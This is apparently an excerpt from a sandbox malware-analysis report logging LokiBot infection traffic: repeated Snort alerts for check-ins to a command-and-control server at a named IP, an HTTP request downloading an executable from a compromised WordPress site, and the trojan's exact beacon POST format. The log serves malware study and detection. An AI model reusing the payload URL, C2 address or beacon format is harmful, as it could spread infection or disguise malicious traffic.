                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49239 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49239 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49239 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49239 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49239
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49240 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49240 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49240 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49240 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49240
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49241 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49241 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49241 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49241 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49241
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49242 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49242 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49242 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49242 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49242
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49243 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49243 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49243 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49243 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49243
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49244 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49244 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49244 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49244 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49244
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49245 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49245 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49245 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49245 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49245
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49246 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49246 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49246 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49246 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49246
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49247 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49247 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49247 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49247 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49247
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49248 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49248 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49248 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49248 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49248
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49249 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49249 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49249 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49249 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49249
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49250 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49250 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49250 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49250 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49250
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49251 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49251 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49251 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49251 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49251
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49252 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49252 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49252 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49252 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49252
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49253 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49253 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49253 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49253 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49253
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49254 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49254 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49254 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49254 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49254
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49255 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49255 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49255 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49255 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49255
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49256 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49256 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49256 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49256 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49256
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49257 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49257 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49257 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49257 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49257
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49258 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49258 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49258 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49258 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49258
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49259 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49259 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49259 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49259 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49259
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49260 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49260 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49260 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49260 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49260
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49261 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49261 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49261 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49261 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49261
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49262 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49262 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49262 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49262 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49262
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49263 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49263 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49263 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49263 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49263
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49264 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49264 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49264 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49264 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49264
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49265 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49265 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49265 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49265 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49265
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49266 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49266 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49266 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49266 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49266
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49267 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49267 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49267 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49267 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49267
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49268 -> 185.206.215.56:80
                Source: global trafficHTTP traffic detected: GET /wp-content/themes/index/QPR-3067.exe HTTP/1.1Host: bighoreca.nlConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 104.22.0.232 104.22.0.232
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: ON-LINE-DATAServerlocation-NetherlandsDrontenNL ON-LINE-DATAServerlocation-NetherlandsDrontenNL
                Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 176Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 176Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
